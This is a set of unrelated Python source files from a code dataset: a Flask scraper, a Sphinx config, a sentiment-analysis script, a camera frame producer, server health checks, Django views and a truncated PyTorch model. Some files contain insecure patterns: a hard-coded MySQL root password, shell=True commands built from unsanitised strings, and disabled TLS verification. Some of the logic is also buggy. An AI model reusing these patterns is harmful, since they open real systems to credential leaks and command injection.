\"\"\"\n\n @dynamic_test\n def test(self):\n main = TestedProgram('main')\n main.start()\n return correct()\n\n def test_run_unittest(self):\n before = loop_detector.check_no_input_requests_for_long\n loop_detector.check_no_input_requests_for_long = True\n 
super().test_run_unittest()\n loop_detector.check_no_input_requests_for_long = before\n","sub_path":"tests/outcomes/infinite_loop/infinite_loop_test_char/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"559963647","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 25 00:33:56 2017\n\n@author: Avneesh Srivastava\n\"\"\"\nfrom flask import Flask, jsonify\nimport os\nimport Constants\nfrom flask_compress import Compress\nimport datetime\nfrom scraper_lib.InstagramScraper import InstagramScraper\n#Constants\nlogger = Constants.LOGGER\nport = int(os.getenv(\"VCAP_APP_PORT\") or 5500)\n#Flask App\napp = Flask(__name__)\n#GZIP Compression\nCompress(app)\napp.constants = Constants\na=InstagramScraper()\n\n#Main Health Check Endpoint\n@app.route('/')\ndef health_check():\n\tresponseObject = dict([('status','OK'),('app_name','Instagram Scraper'),('time',datetime.datetime.now())])\n\treturn jsonify(responseObject)\n\n@app.route('/')\ndef getCausecode(username):\n if username is not None:\n username = username.strip()\n return jsonify(a.queryInstagram(username))\n else:\n return jsonify(dict[('error','Invalid Username'),('error_code','INVALID_USERNAME')])\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"437008137","text":"from __future__ import print_function\nimport os\nimport os.path as path\nimport subprocess\n\ndoxygen_output_dir = path.abspath(\n os.environ.get('DOXYGEN_OUTPUT_DIR', './doxygen'))\n\ncode_source_dir = path.abspath(\n os.environ.get('CODE_SOURCE_DIR',\n path.join(path.dirname(__file__),\n '..',\n 'include',\n 'observable')))\n\ndocs_source_dir = path.abspath(path.dirname(__file__))\n\n# Sphinx configuration\n\nproject = 
\"Observable\"\nmaster_doc = 'index'\n\nextensions = ['breathe']\nbreathe_projects = {\n 'observable': doxygen_output_dir\n}\n\nbreathe_default_project = 'observable'\nbreathe_domain_by_file_pattern = {\n '*': 'cpp',\n}\n\n# Doxygen configuration\n\ndef run_doxygen(app):\n \"\"\"Run Doxygen over the library source.\"\"\"\n print(\"Running Doxygen. Input dir is '%s'. Output dir is '%s'.\" % \n (code_source_dir, doxygen_output_dir))\n\n doxygen_conf = [\n 'PROJECT_NAME = \"%s\"' % project,\n 'GENERATE_XML = YES',\n 'INPUT = %s' % code_source_dir,\n 'OUTPUT_DIRECTORY = %s' % doxygen_output_dir,\n 'XML_OUTPUT = %s' % doxygen_output_dir,\n 'RECURSIVE = YES',\n 'GENERATE_HTML = NO',\n 'GENERATE_LATEX = NO',\n 'QUIET = YES',\n 'INLINE_INHERITED_MEMB = YES',\n 'BUILTIN_STL_SUPPORT = YES',\n 'EXTRACT_PRIVATE = YES',\n 'WARN_IF_UNDOCUMENTED = NO',\n ]\n\n proc = subprocess.Popen(['doxygen', '-'],\n stdin=subprocess.PIPE,\n universal_newlines=True)\n proc.communicate('\\n'.join(doxygen_conf))\n proc.wait()\n\ndef setup(app):\n # Run doxygen after Sphinx is initialized.\n app.connect('builder-inited', run_doxygen)","sub_path":"docs/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"549751072","text":"import pandas as pd\r\nimport numpy as np\r\nimport re\r\nimport nltk\r\nfrom nltk.sentiment.util import *\r\nfrom func import sentimfunc as stm\r\nfrom func import datavil as dvl\r\nfrom func import blankck as blk\r\nfrom func import classck as clck\r\nfrom func import likecount as lk\r\nfrom func import heatmap as hmp\r\nimport MySQLdb\r\nimport pandas.io.sql as psql\r\n\r\n\r\n# Initialization of variables\r\nneg = 0\r\npos = 0\r\nneu = 0\r\nblank = 0\r\ns = 0\r\nvalues = []\r\nlist = {}\r\n'''\r\nquery1 used to select all the data from the target sql table which isn't already present in the message_new table\r\nquery2 used to insert data into 
message_new\r\n\r\n'''\r\n# Queries\r\nquery1=\"SELECT * FROM message_table \" \\\r\n \" WHERE message_table.Message_Id \" \\\r\n \" NOT IN (SELECT message_new.Message_Id FROM message_new) \" \\\r\n \" ORDER BY Message_Id\"\r\nquery2 = \"INSERT INTO message_new (sentiment,Category,NA,Difference,Intermediate_Sentiment,Message_Id) VALUES (%s,%s,%s,%s,%s,%s) \"\r\nquery3 = 'SELECT * FROM message_new'\r\n\r\n\r\n# Connecting to the database\r\ndb = MySQLdb.connect( user='root', passwd='password', db='babbles')\r\n\r\n# Using query1 to assign the results to a pandas dataframe\r\ndf1 = psql.read_sql(query1, con=db)\r\n\r\n# Making columns that are local to the data frame and initializing them\r\ndf1[\"sentiment\"]=\"\"\r\ndf1[\"Category\"]=\"\"\r\ndf1[\"NA\"]=\"\"\r\ndf1[\"Intermediate_Sentiment\"]=\"\"\r\ndf1[\"Difference\"]=\"\"\r\n\r\n\r\n# Initializing the cursor\r\ncursor=db.cursor()\r\n\r\n# Filling in 0s in place of blank values\r\ndf1.fillna('0', axis=1, inplace=True)\r\n\r\n# Remove special characters to normalize the data\r\nremoveSpecialCharacters = ['\\.', '\\;', '\\:', '\\!', '\\?', '\\-', '\\#[A-Za-z0-9]+', \"\\'\", '\\(', '\\)']\r\nfor item in removeSpecialCharacters:\r\n df1['Message_Original'].replace(item, '', regex=True, inplace=True)\r\n\r\n# Lists for positive and negative words\r\nfilePath = \"positive-words.txt\"\r\npositivewords = []\r\nwordCount = 0\r\n\r\n# Read lines into a list\r\nfile = open(filePath, 'rU')\r\nfor line in file:\r\n for word in line.split():\r\n positivewords.append(word)\r\n wordCount += 1\r\n\r\nfilePath2 = \"negative-words.txt\"\r\nnegativewords = []\r\nwordCount = 0\r\n\r\nfile = open(filePath2, 'rU')\r\nfor line in file:\r\n for word in line.split():\r\n negativewords.append(word)\r\n wordCount += 1\r\nposcount = 0\r\nnegcount = 0\r\ndifcount = 0\r\n\r\n\r\nfor row,i in enumerate(df1[\"Message_Original\"]):\r\n posres = [f for f in positivewords if(f in i)]\r\n poscount=len(posres)\r\n negres = [f for f in negativewords 
if(f in i)]\r\n negcount=len(negres)\r\n difcount = poscount - negcount\r\n df1.loc[row,'Difference'] = difcount\r\n\r\n# Applying sentiment analysis function\r\nA = df1['Message_Original'] = df1['Message_Original'].apply(str)\r\ndf1['sentiment'] = A.apply(stm.sentimentP)\r\n\r\n# Checking for Blank Messages\r\nblank = blk.blankcheck(df1)\r\n'''\r\n#df1['subjectivity'] = A.apply(stm.sentimentS) \r\n#subjectivity = df1['subjectivity'] To be used in the future\r\n#Polarity = df1['sentiment']\r\n\r\n'''\r\n# Modifying the sentiment values to deal with the relative sentiment analysis problem\r\nfor z in list:\r\n if df1.loc[z, 'IsOP'] == 'Y':\r\n s = df1.loc[z, 'sentiment']\r\n for i in list:\r\n if df1.loc[i, 'IsOP'] == 'N':\r\n if s < 0 and df1.loc[i , 'sentiment'] > 0:\r\n df1.loc[i, 'sentiment'] = -0.5\r\n elif s < 0 and df1.loc[i, 'sentiment'] < 0:\r\n df1.loc[i, 'sentiment'] = 0.5\r\n else:\r\n pass\r\n\r\n# Dealing with image data\r\nfor index,i in enumerate(df1[\"Is_Image\"]):\r\n if i==\"Y\" and df1.loc[index,\"IsOP\"]==\"N\":\r\n df1.loc[index,\"sentiment\"]=-0.551\r\n df1.loc[index,\"Category\"]=\"Negative\"\r\n else:\r\n pass\r\n\r\n# Tinkering with the sentiment of the data to improve upon it\r\nlk.likedislike(df1)\r\nfor i in range(len(df1)):\r\n if i < len(df1.index) - 1: # the index starts from 0 so that is the reason for the -1\r\n df1.loc[i,'Intermediate_Sentiment'] = df1.loc[i,'sentiment']\r\n\r\n# Adding the difference between positive and negative words to the sentiment\r\nfor index,i in enumerate(df1['sentiment']):\r\n df1.loc[index,'sentiment'] += (df1.loc[index,'Difference'])/10\r\n\r\n# Visualising the data\r\npos, neg, neu = clck.ClassCheck(df1)\r\ndvl.dataVisualization(pos, neg, neu)\r\n\r\nprint(f'Number of blank spaces : {blank}')\r\n\r\n# Making a temp dataframe to use it's len function\r\ntempVariable=pd.DataFrame(df1)\r\n\r\n# Making all the data into str 
type\r\ndf1['Intermediate_Sentiment']=df1['Intermediate_Sentiment'].apply(str)\r\ndf1['Difference']=df1['Difference'].apply(str)\r\n\r\n# Selecting the values to be inserted into the table\r\nfor index in range(len(df1)):\r\n if index < len(df1.index)-1: # The minus 1 is there due to the records starting at 0\r\n msgID=df1.loc[index,\"Message_Id\"]\r\n NA = df1.loc[index, \"NA\"]\r\n sentiment = df1.loc[index, \"sentiment\"]\r\n category = df1.loc[index, \"Category\"]\r\n intSent = df1.loc[index,\"Intermediate_Sentiment\"]\r\n diff = df1.loc[index,\"Difference\"]\r\n values.append((sentiment,category,NA,diff,intSent,msgID))\r\n # Print statement for debugging purposes\r\n print ('insert into db')\r\n\r\n# Executing query2\r\ncursor.executemany(query2, values)\r\n\r\nhmp.heatmap(df1)\r\n\r\n#Visualizing data for every value\r\n\r\ndf1 = psql.read_sql(query3, con=db)\r\npost = int(0)\r\nnegt = int(0)\r\nneut = int(0)\r\nfor index in range(len(df1)):\r\n if index < len(df1.index) - 1:\r\n i = float(df1.loc[index,'sentiment'])\r\n print(i)\r\n df1.loc[index,'sentiment'] = i\r\n\r\npost, negt, neut = clck.ClassCheck(df1)\r\ndvl.dataVisualization(post, negt, neut)\r\n\r\n\r\n# Closing the cursor object, committing the changes to the database and closing the database\r\ncursor.close()\r\ndb.commit()\r\ndb.close()\r\n\r\n\r\n\r\n","sub_path":"sentiment.py","file_name":"sentiment.py","file_ext":"py","file_size_in_byte":5860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"257156015","text":"\"\"\"\nproducer of DVS frames for classification of joker/nonjoker by consumer processs\nAuthors: Tobi Delbruck, Yuhuang Hu, Shasha Guo, Min Liu Oct 2020\n\"\"\"\n\nimport atexit\nimport pickle\nfrom pathlib import Path\n\nimport cv2\nimport sys\nimport math\nimport time\nimport numpy.ma as ma\nimport socket\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom globals_and_utils import *\nfrom engineering_notation import EngNumber as 
eng # only from pip\nimport argparse\nimport psutil\n\nfrom pyaer.davis import DAVIS\nfrom pyaer import libcaer\n\nlog=my_logger(__name__)\n\n\n\ndef producer(args):\n \"\"\" produce frames for consumer\n\n :param record: record frames to a folder name record\n \"\"\"\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n udp_address = ('', PORT)\n\n device = DAVIS(noise_filter=True)\n recording_folder = None\n recording_frame_number = 0\n\n def cleanup():\n log.info('closing {}'.format(device))\n device.shutdown()\n cv2.destroyAllWindows()\n if recording_folder is not None:\n log.info(f'*** recordings of {recording_frame_number - 1} frames saved in {recording_folder}')\n\n atexit.register(cleanup)\n record=args.record\n spacebar_records=args.spacebar_records\n space_toggles_recording=args.space_toggles_recording\n if space_toggles_recording and spacebar_records:\n log.error('set either spacebar_records or space_toggles_recording')\n quit(1)\n log.info(f'recording to {record} with spacebar_records={spacebar_records} space_toggles_recording={space_toggles_recording} and args {str(args)}')\n if record is not None:\n recording_folder = os.path.join(DATA_FOLDER, 'recordings', record)\n log.info(f'recording frames to {recording_folder}')\n Path(recording_folder).mkdir(parents=True, exist_ok=True)\n\n print(\"DVS USB ID:\", device.device_id)\n if device.device_is_master:\n print(\"DVS is master.\")\n else:\n print(\"DVS is slave.\")\n print(\"DVS Serial Number:\", device.device_serial_number)\n print(\"DVS String:\", device.device_string)\n print(\"DVS USB bus Number:\", device.device_usb_bus_number)\n print(\"DVS USB device address:\", device.device_usb_device_address)\n print(\"DVS size X:\", device.dvs_size_X)\n print(\"DVS size Y:\", device.dvs_size_Y)\n print(\"Logic Version:\", device.logic_version)\n print(\"Background Activity Filter:\",\n device.dvs_has_background_activity_filter)\n print(\"Color Filter\", device.aps_color_filter, 
type(device.aps_color_filter))\n print(device.aps_color_filter == 1)\n\n # device.start_data_stream()\n assert (device.send_default_config())\n # attempt to set up USB host buffers for acquisition thread to minimize latency\n assert (device.set_config(\n libcaer.CAER_HOST_CONFIG_USB,\n libcaer.CAER_HOST_CONFIG_USB_BUFFER_NUMBER,\n 8))\n assert (device.set_config(\n libcaer.CAER_HOST_CONFIG_USB,\n libcaer.CAER_HOST_CONFIG_USB_BUFFER_SIZE,\n 4096))\n assert (device.data_start())\n assert (device.set_config(\n libcaer.CAER_HOST_CONFIG_PACKETS,\n libcaer.CAER_HOST_CONFIG_PACKETS_MAX_CONTAINER_INTERVAL,\n 4000)) # set max interval to this value in us. Set to not produce too many packets/sec here, not sure about reasoning\n assert (device.set_data_exchange_blocking())\n\n # setting bias after data stream started\n device.set_bias_from_json(\"./configs/davis346_config.json\")\n xfac = float(IMSIZE) / device.dvs_size_X\n yfac = float(IMSIZE) / device.dvs_size_Y\n histrange = [(0, v) for v in (IMSIZE, IMSIZE)] # allocate DVS frame histogram to desired output size\n npix = IMSIZE * IMSIZE\n cv2_resized = False\n last_cv2_frame_time = time.time()\n frame=None\n frame_number=0\n time_last_frame_sent=time.time()\n frames_dropped_counter=0\n recording_activated=False\n save_next_frame=(not space_toggles_recording and not spacebar_records) # if we don't supply the option, it will be False and we want to then save all frames\n saved_events=[]\n\n vflow_ppus=0 # estimate vertical flow, pixels per microsecond, positive. 
Does not really help since mainly informative frames are when card is exposed\n try:\n timestr = time.strftime(\"%Y%m%d-%H%M\")\n numpy_frame_rate_data_file_path = f'{DATA_FOLDER}/producer-frame-rate-{timestr}.npy'\n while True:\n\n with Timer('overall producer frame rate', numpy_file=numpy_frame_rate_data_file_path , show_hist=True) as timer_overall:\n with Timer('accumulate DVS'):\n events = None\n while events is None or len(events)0:\n if events is None:\n events=pol_events\n else:\n events = np.vstack([events, pol_events]) # otherwise tack new events to end\n # log.debug('got {} events (total so far {}/{} events)'\n # .format(num_pol_event, 0 if events is None else len(events), EVENT_COUNT))\n dtMs = (time.time() - time_last_frame_sent)*1e3\n if recording_folder is None and dtMs args.clip_count]=args.clip_count\n frame= (255. / args.clip_count) * frame # max pixel will have value 255\n\n # statistics\n # focc=np.count_nonzero(frame)\n frame=frame.astype('uint8')\n # log.debug('from {} events, frame has occupancy {}% max_count {:.1f} events'.format(len(events), eng((100.*focc)/npix), fmax_count))\n\n with Timer('send frame'):\n time_last_frame_sent=time.time()\n data = pickle.dumps((frame_number, time_last_frame_sent, frame)) # send frame_number to allow determining dropped frames in consumer\n frame_number+=1\n client_socket.sendto(data, udp_address)\n if recording_folder is not None and (save_next_frame or recording_activated):\n recording_frame_number=write_next_image(recording_folder,recording_frame_number,frame)\n print('.',end='')\n if recording_frame_number%80==0:\n print('')\n if SHOW_DVS_OUTPUT:\n t=time.time()\n if t-last_cv2_frame_time>1./MAX_SHOWN_DVS_FRAME_RATE_HZ:\n last_cv2_frame_time=t\n with Timer('show DVS image'):\n # min = np.min(frame)\n # img = ((frame - min) / (np.max(frame) - min))\n cv2.namedWindow('DVS', cv2.WINDOW_NORMAL)\n cv2.imshow('DVS', 1-(1/256.)*frame)\n if not cv2_resized:\n cv2.resizeWindow('DVS', 600, 600)\n cv2_resized = 
True\n k= cv2.waitKey(1) & 0xFF\n if k== ord('q') or k== ord('x'):\n if recording_folder is not None:\n log.info(f'*** recordings of {recording_frame_number - 1} frames saved in {recording_folder}')\n print_timing_info()\n break\n elif k==ord('p'):\n print_timing_info()\n elif k==ord(' ') and (spacebar_records or space_toggles_recording):\n if spacebar_records:\n save_next_frame=True\n else:\n recording_activated=not recording_activated\n if recording_activated:\n print('recording activated - use space to stop recording')\n else:\n print('recording paused - use space to start recording')\n save_next_frame=recording_activated\n else:\n save_next_frame=(recording_activated or (not spacebar_records and not space_toggles_recording))\n if saved_events is not None and recording_folder is not None and len(saved_events)>0:\n nevents=0\n for a in saved_events:\n nevents+=len(a)\n o=np.empty((nevents,5),dtype=np.float32)\n idx=0\n for a in tqdm(saved_events,desc='converting events to numpy'):\n o[idx:idx+a.shape[0]]=a\n idx+=a.shape[0]\n data_path=os.path.join(recording_folder,f'events-{timestr}.npy')\n log.info(f'saving {eng(nevents)} events to {data_path}')\n np.save(data_path,o)\n except KeyboardInterrupt as e:\n log.info(f'got KeyboardInterrupt {e}')\n cleanup()\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='producer: Generates DVS frames for trixy to process in consumer', allow_abbrev=True,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\n \"--record\", type=str, default=None,\n help=\"record DVS frames into folder DATA_FOLDER/collected/\")\n parser.add_argument(\n \"--num_events\", type=int, default=EVENT_COUNT_PER_FRAME,\n help=\"number of events per constant-count DVS frame\")\n parser.add_argument(\n \"--clip_count\", type=int, default=EVENT_COUNT_CLIP_VALUE,\n help=\"number of events per pixel for full white pixel value\")\n parser.add_argument(\n \"--spacebar_records\", action='store_true',\n 
help=\"only record when spacebar pressed down\")\n parser.add_argument(\n \"--space_toggles_recording\", action='store_true',\n help=\"space toggles recording on/off\")\n parser.add_argument(\n \"--numpy\", action='store_true',\n help=\"saves raw AE data to RAM and writes as numpy at the end (will gobble RAM like crazy)\")\n args = parser.parse_args()\n\n producer(args)\n","sub_path":"producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":11958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"641176410","text":"# From Bing chat 04/28/23: Display real time countdown clock to date/time specified in config.txt\n# output to a web page\n\nfrom flask import Flask, render_template\nimport datetime\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n with open('config.txt') as f:\n date_str = f.readline().strip()\n date = datetime.datetime.strptime(date_str, '%Y-%m-%d %H:%M:%S')\n now = datetime.datetime.now()\n diff = date - now\n return render_template('index.html', diff=diff)\n print(\"Time remaining:\", diff)\nif __name__ == '__main__':\n app.run(debug=True)\n#index()","sub_path":"countdown/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"640388243","text":"import abc\nimport hvac\nimport logging\nimport os\nimport pwd\nimport requests\nimport socket\nimport subprocess\nimport urllib\n\nfrom retry import retry\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\n\nclass BaseCheck(object):\n __metaclass__ = abc.ABCMeta\n\n log_level = os.getenv('CHECKS_LOG_LEVEL', 'INFO')\n logging.basicConfig(level=logging.getLevelName(log_level), format='%(levelname)s | %(message)s')\n\n @abc.abstractmethod\n def check(self, **kwargs):\n pass\n\n\n def run(self, **kwargs):\n self.check(**kwargs)\n\n\n @retry(tries=5, delay=5, max_delay=120, backoff=2, 
jitter=0)\n def systemd_unit_is_running(self, name):\n command = 'systemctl is-active {}'.format(name)\n process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)\n process.wait()\n result = process.stdout.read().rstrip()\n\n if result != 'active':\n logging.error('Service {} is not active'.format(name))\n raise Exception()\n logging.info(' * Service {} is active'.format(name))\n\n\n @retry(tries=5, delay=5, max_delay=120, backoff=2, jitter=0)\n def systemd_unit_is_enabled(self, name):\n command = 'systemctl list-unit-files | grep {} | grep enabled'.format(name)\n process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)\n process.wait()\n result = process.stdout.read().rstrip()\n\n if result == '':\n logging.error('Service {} is not enabled'.format(name))\n raise Exception()\n logging.info(' * Service {} is enabled'.format(name))\n\n\n @retry(tries=5, delay=5, max_delay=120, backoff=2, jitter=0)\n def ports_is_being_listened(self, ports, protocol = 'tcp'):\n not_opened = list()\n passed = True\n socket_type = socket.SOCK_STREAM if protocol == 'udp' else socket.SOCK_DGRAM\n\n for port in ports:\n sock = socket.socket(socket.AF_INET, socket_type)\n result = sock.connect_ex(('127.0.0.1', port))\n if result != 0:\n not_opened.append(port)\n passed = False\n\n if not passed:\n logging.error('{} ports check failed: {}'.format(protocol, not_opened))\n raise Exception()\n logging.info(' * {} ports have listeners: {}'.format(protocol, ports))\n\n\n @retry(tries=5, delay=5, max_delay=120, backoff=2, jitter=0)\n def http_check(self, url, expected_code):\n response_code = urllib.urlopen(url).getcode()\n if response_code == expected_code:\n logging.error('{} returned: {}, but expected {}'.format(url, response_code, expected_code))\n raise Exception()\n logging.info(' * Url {} returned {}'.format(url, expected_code))\n\n\n @retry(tries=5, delay=5, max_delay=120, backoff=2, jitter=0)\n def file_or_directory_exists(self, path):\n if not 
os.path.exists(path):\n logging.error('{} does not exist'.format(path))\n raise Exception()\n logging.info((' * {} string exists'.format(path)))\n\n\n @retry(tries=5, delay=5, max_delay=120, backoff=2, jitter=0)\n def file_contains(self, file, search_string):\n if not search_string in open(file).read():\n logging.error('{} string does not exist in {}'.format(search_string, file))\n raise Exception()\n logging.info((' * {} string exists in {}'.format(search_string, file)))\n\n\n @retry(tries=5, delay=5, max_delay=120, backoff=2, jitter=0)\n def user_exists(self, uid):\n try:\n pwd.getpwuid(uid)\n except KeyError:\n logging.error('User ID {} does not exist'.format(uid))\n raise Exception()\n logging.info(' * User ID {} exists'.format(uid))\n\n\n @retry(tries=5, delay=5, max_delay=120, backoff=2, jitter=0)\n def hostname_resolves(self, hostname):\n try:\n socket.gethostbyname(hostname)\n except Exception:\n logging.error('Hostname {} does not resolve'.format(hostname))\n raise Exception()\n logging.info(' * {} hostname resolves successfully.'.format(hostname))\n\n\n @retry(tries=5, delay=5, max_delay=120, backoff=2, jitter=0)\n def vault_initialised(self, vault_addr):\n requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n vault = hvac.Client(url=vault_addr, verify=False)\n\n if not vault.sys.is_initialized():\n logging.error('Vault [{}] is not initialized.'.format(vault_addr))\n raise Exception()\n logging.info(' * Vault [{}] is initialized'.format(vault_addr))\n\n\n @retry(tries=5, delay=5, max_delay=120, backoff=2, jitter=0)\n def self_in_peers_list(self, peers_list_url, listening_port):\n ip = requests.get('http://169.254.169.254/latest/meta-data/local-ipv4').text\n peer = '{}:{}'.format(ip, listening_port)\n peer_list = requests.get(peers_list_url).json()\n if peer not in peer_list:\n logging.error('Peer () not in list ({}).'.format(peer, peer_list))\n raise Exception()\n logging.info(' * Peer in 
list.')\n","sub_path":"ansible/roles/cfn-tools/templates/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"166904634","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.core.urlresolvers import reverse\nfrom django.utils.timezone import now, make_aware, get_default_timezone\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.http import require_http_methods\nfrom django.db.models import F, Count\nfrom page.models import Assistant, Course, Question\nfrom page.forms import AssistantForm, QuestionForm\nfrom page import __init__\nimport datetime\n\n# Create your views here.\nANNOUNCEMENT_TIME = make_aware(datetime.datetime(year=2016,month=2,day=29,hour=23,minute=45), get_default_timezone())\nRESULT_PROCESS = False\n\ndef show_main(request):\n\treturn render(request, 'show_main.html')\n\n@login_required\ndef edit_my_info(request):\n\ttry:\n\t\tmy_info = Assistant.objects.get(user=request.user)\n\texcept Assistant.DoesNotExist:\n\t\tform = AssistantForm()\n\t\tform.user = request.user\n\telse:\n\t\tform = AssistantForm(instance=my_info)\n\treturn render(request, 'edit_my_info.html', {'form':form})\n\n\n@login_required\n@require_http_methods([\"POST\"])\ndef save_my_info(request):\n\tglobal ANNOUNCEMENT_TIME\n\tif now() > ANNOUNCEMENT_TIME:\n\t\treturn redirect(reverse('edit_my_info'))\n\tform = AssistantForm(request.POST)\n\tif form.is_valid():\n\t\tassistant = form.save(commit=False)\n\t\tif assistant.third_course != None and assistant.second_course == None:\n\t\t\treturn redirect(reverse('edit_my_info'))\n\t\telse:\n\t\t\tif assistant.semester > 0:\n\t\t\t\treturn redirect(reverse('edit_my_info'))\n\t\t\tif assistant.second_course != None and assistant.third_course == None:\n\t\t\t\tif assistant.first_course == assistant.second_course:\n\t\t\t\t\treturn 
redirect(reverse('edit_my_info'))\n\t\t\telif assistant.second_course != None and assistant.third_course != None:\n\t\t\t\tif (assistant.first_course == assistant.second_course) or (assistant.first_course == assistant.third_course) or (assistant.second_course == assistant.third_course):\n\t\t\t\t\treturn redirect(reverse('edit_my_info'))\n\t\t\tassistant.user = request.user\n\t\t\tassistant.save()\n\t\t\treturn redirect(reverse('show_main'))\n\telse:\n\t\treturn redirect(reverse('edit_my_info'))\n\n\n@login_required\ndef show_result(request):\n\tglobal ANNOUNCEMENT_TIME, RESULT_PROCESS\n\tif now() > ANNOUNCEMENT_TIME:\n\t\tif not RESULT_PROCESS:\n\t\t\tcourse_list = Course.objects.annotate(final_assistant_count=Count('final_assistant',distinct=True))\\\n\t\t\t\t\t\t .filter(final_assistant_count__lt=F('assistant_number'))\n\t\t\tfor course in course_list:\n\t\t\t\tif course.assistant_number-course.final_assistant_count >= course.first_assistant.filter(result=None).count():\n\t\t\t\t\tfor assistant in course.first_assistant.filter(result=None):\n\t\t\t\t\t\tassistant.result = course\n\t\t\t\t\t\tassistant.save()\n\t\t\t\telse:\n\t\t\t\t\tfor assistant in course.first_assistant.filter(result=None).order_by('?')[:course.assistant_number]:\n\t\t\t\t\t\tassistant.result = course\n\t\t\t\t\t\tassistant.save()\n\t\t\tcourse_list = Course.objects.annotate(final_assistant_count=Count('final_assistant',distinct=True))\\\n\t\t\t\t\t\t .filter(final_assistant_count__lt=F('assistant_number'))\n\t\t\tfor course in course_list:\n\t\t\t\tif course.assistant_number-course.final_assistant_count >= course.second_assistant.filter(result=None).count():\n\t\t\t\t\tfor assistant in course.second_assistant.filter(result=None):\n\t\t\t\t\t\tassistant.result = course\n\t\t\t\t\t\tassistant.save()\n\t\t\t\telse:\n\t\t\t\t\tfor assistant in course.second_assistant.filter(result=None).order_by('?')[:course.assistant_number]:\n\t\t\t\t\t\tassistant.result = 
course\n\t\t\t\t\t\tassistant.save()\n\t\t\tcourse_list = Course.objects.annotate(final_assistant_count=Count('final_assistant',distinct=True))\\\n\t\t\t\t\t\t .filter(final_assistant_count__lt=F('assistant_number'))\n\t\t\tfor course in course_list:\n\t\t\t\tif course.assistant_number-course.final_assistant_count >= course.third_assistant.filter(result=None).count():\n\t\t\t\t\tfor assistant in course.third_assistant.filter(result=None):\n\t\t\t\t\t\tassistant.result = course\n\t\t\t\t\t\tassistant.save()\n\t\t\t\telse:\n\t\t\t\t\tfor assistant in course.third_assistant.filter(result=None).order_by('?')[:course.assistant_number]:\n\t\t\t\t\t\tassistant.result = course\n\t\t\t\t\t\tassistant.save()\n\t\t\tRESULT_PROCESS = True\n\t\tcourse_list = Course.objects.annotate(Count('first_assistant',distinct=True),\\\n\t\t\t\tCount('second_assistant',distinct=True),Count('third_assistant',distinct=True))\n\t\treturn render(request, 'show_result.html', {'course_list':course_list})\n\telse:\n\t\tcourse_list = Course.objects.annotate(Count('first_assistant',distinct=True),\\\n\t\t\t\tCount('second_assistant',distinct=True),Count('third_assistant',distinct=True))\n\t\treturn render(request, 'show_result_before.html', {'time':ANNOUNCEMENT_TIME, 'course_list':course_list})\n\n@login_required\ndef write_question(request):\n\tif request.method == 'POST':\n\t\tform = QuestionForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tquestion = form.save(commit=False)\n\t\t\tquestion.user = request.user\n\t\t\tquestion.save()\n\t\t\treturn redirect(reverse('show_main'))\n\telse:\n\t\tform = QuestionForm()\n\treturn render(request, 'write_question.html', {'form':form})\n\n@login_required\ndef show_question(request):\n\tquestion_list = Question.objects.all().order_by('-date')\n\treturn render(request, 'show_question.html', 
{'question_list':question_list})\n","sub_path":"assistant_distribution/page/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"140514666","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n @Time : 2018/11/16 10:34\n@Author : LI Zhe\n\"\"\"\nimport torch\nfrom torch import nn, optim\nfrom torch.autograd import Variable\nfrom data_utils import Corpus\n\nclass language_model(nn.Module):\n def __init__(self, vocab_size, embedding_dim, hidden_size, num_layers):\n super(language_model, self).__init__()\n self.embedding = nn.Embedding(vocab_size, embedding_dim)\n self.lstm = nn.LSTM(embedding_dim, hidden_size, num_layers, batch_first=True)\n self.linear = nn.Linear(hidden_size, vocab_size)\n\n def forward(self, x, h):\n x = self.embedding(x)\n x, hi = self.lstm(x, h)\n b, s, h = x.size()\n x = x.contiguous().view(b * s, h)\n x = self.linear(x)\n return x, hi\n\nseq_length = 30\n\ntrain_file = 'train.txt'\nval_file = 'val.txt'\ntest_file = 'test.txt'\ntrain_corpus = Corpus()\nval_corpus = Corpus()\ntest_corpus = Corpus()\n\ntrain_id = train_corpus.get_data(train_file)\nval_id = train_corpus.get_data(val_file)\ntest_id = train_corpus.get_data(test_file)\n\nvocab_size = len(train_corpus.dic)\nnum_batches = train_id.size(1) // seq_length\n\nmodel = language_model(vocab_size, 128, 1024, 1)\n\n# if torch.cuda.device_count() > 1:\n# model = nn.DataParallel(model)\nif torch.cuda.is_available():\n model = model.cuda()\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.Adam(model.parameters(), lr=1e-3)\n\ndef detach(states):\n if torch.cuda.is_available():\n return [Variable(state.data).cuda() for state in states]\n else:\n return 